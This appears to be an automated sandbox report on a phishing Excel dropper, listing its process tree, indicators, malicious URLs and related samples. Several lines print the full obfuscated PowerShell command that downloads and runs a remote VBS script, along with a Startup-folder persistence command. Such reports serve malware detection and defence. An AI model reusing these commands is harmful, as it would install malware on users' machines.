Source: Binary string: ws\dll\System.pdb source: powershell.exe, 0000000F.00000002.966928962.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdbyp source: powershell.exe, 00000003.00000002.921917508.0000000002776000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.922168339.00000000029E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.967082775.0000000002C97000.00000004.00000020.00020000.00000000.sdmp
Source: ~DF4FEF5585DDEBC2FF.TMP.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe TID: 1056 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 1168 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 980 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 0000000F.00000002.965035928.000000000040A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(...
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,011
10100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,011001Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,011
10100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,011001Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 11 Command and Scripting Interpreter; 321 Scripting; 1 Exploitation for Client Execution; 2 PowerShell; Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: 11 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: 1 Masquerading; 1 Modify Registry; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 321 Scripting; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Remote System Discovery; 2 File and Directory Discovery; 13 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: 1 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Behavior Graph ID: 690542, Sample: ACH Remittance Advice_CITI2..., Startdate: 26/08/2022, Architecture: WINDOWS, Score: 80

Source | Detection | Scanner | Label
ACH Remittance Advice_CITI25822.xls | 13% | Virustotal |
ACH Remittance Advice_CITI25822.xls | 10% | ReversingLabs | Document-Excel.Dropper.SDrop
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://kopadd.yunethosting.rs/sync/gith.vbsPEH | 0% | Avira URL Cloud | safe
https://kopadd.yunethosting.rs/sync/gith.vbs | 3% | Virustotal |
https://kopadd.yunethosting.rs/sync/gith.vbs | 0% | Avira URL Cloud | safe
https://kopadd.yunethos(OE | 0% | Avira URL Cloud | safe
http://www.piriform.co | 0% | Virustotal |
http://www.piriform.co | 0% | Avira URL Cloud | safe
https://kopadd.y | 0% | Avira URL Cloud | safe
https://kopadd.yunethosting.rs | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
https://kopadd.yunethosting.rs/s | 0% | Avira URL Cloud | safe
http://209.127.20.13/firm.txt | 100% | Avira URL Cloud | malware
http://209.127.20.13/remit.jpg | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://209.127.20.13/favicon.ico | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
google.com | 142.250.184.78 | true | false | | high
kopadd.yunethosting.rs | 194.247.196.66 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://kopadd.yunethosting.rs/sync/gith.vbs | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
http://209.127.20.13/firm.txt | true | Avira URL Cloud: malware | unknown
http://209.127.20.13/remit.jpg | true | Avira URL Cloud: malware | unknown
http://209.127.20.13/favicon.ico | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
209.127.20.13 | unknown | Canada | 55286 | SERVER-MANIACA | false
194.247.196.66 | kopadd.yunethosting.rs | Serbia | 8771 | YUNET-ASRS | false
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 690542
Start date and time: 2022-08-26 00:12:07 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: ACH Remittance Advice_CITI25822.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.expl.evad.winXLS@20/31@4/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 2
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .xls
• Adjust boot time
• Enable AMSI
• Changed system and user locale, location and keyboard layout to English - United States
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.205.181.161, 152.199.19.161
• Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, ie9comview.vo.msecnd.net, go.microsoft.com.edgekey.net, r20swj13mr.microsoft.com, cs9.wpc.v0cdn.net
• Execution Graph export aborted for target powershell.exe, PID 1496 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
00:12:21 | API Interceptor | 387x Sleep call for process: wscript.exe modified
00:12:23 | API Interceptor | 175x Sleep call for process: powershell.exe modified
00:12:40 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs
Match | Associated Sample Name / URL | Detection | Context
209.127.20.13 | Payment Advice.xls | malicious | 209.127.20.13/kiss.jpg
209.127.20.13 | Payment Advice.xls | malicious | 209.127.20.13/sinus.vbs
209.127.20.13 | Remittance_Advice_BofA.xls | malicious | 209.127.20.13/maxine.vbs
209.127.20.13 | Remittance_Advice_BofA.xls | malicious | 209.127.20.13/maxine.vbs
209.127.20.13 | BofA_Remittance_Advice.xls | malicious | 209.127.20.13/maxine.vbs
209.127.20.13 | BofA_Remittance_Advice.xls | malicious | 209.127.20.13/maxine.vbs
194.247.196.66 | IhreRechnung 2022.10.06_1228.xls | malicious | tvstv.yunethosting.rs/nesciuntquos/2SlrSdLBAv7/
194.247.196.66 | ND255492584111901FBT.xls | malicious | tvstv.yunethosting.rs/nesciuntquos/2SlrSdLBAv7/
Match | Associated Sample Name / URL | Detection | Context
google.com | Electronic Payment.xls | malicious | 142.250.184.78
google.com | Delivery Report.exe | malicious | 142.251.209.4
google.com | PO.3123671BKER.exe | malicious | 142.251.209.4
google.com | NEW ORDER.exe | malicious | 142.250.185.110
                • 23.254.119.4
                mzweV0RLB6Get hashmaliciousBrowse
                • 172.245.6.126
                mELrzl6VZkGet hashmaliciousBrowse
                • 104.144.69.41
                mEADpMWrZLGet hashmaliciousBrowse
                • 104.227.93.182
                Payment Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                Payment Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                SecuriteInfo.com.generic.ml.16906.exeGet hashmaliciousBrowse
                • 23.254.119.4
                Remittance_Advice_BofA.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                Remittance_Advice_BofA.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                BofA_Remittance_Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                BofA_Remittance_Advice.xlsGet hashmaliciousBrowse
                • 209.127.20.13
                i586-20220816-1117Get hashmaliciousBrowse
                • 23.250.58.211
                Secpralpro Order Q3 FTD52535345675 .vbsGet hashmaliciousBrowse
                • 23.229.34.139
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                05af1f5ca1b87cc9cc9b25185115607dElectronic Payment.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                EFT Payment Remittance.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                MV_GRACE-Tuticorin-EPDA for AUGUST 22 (STATEMENT)_10.docxGet hashmaliciousBrowse
                • 194.247.196.66
                EFT Payment Remittance.xlsGet hashmaliciousBrowse
                • 194.247.196.66
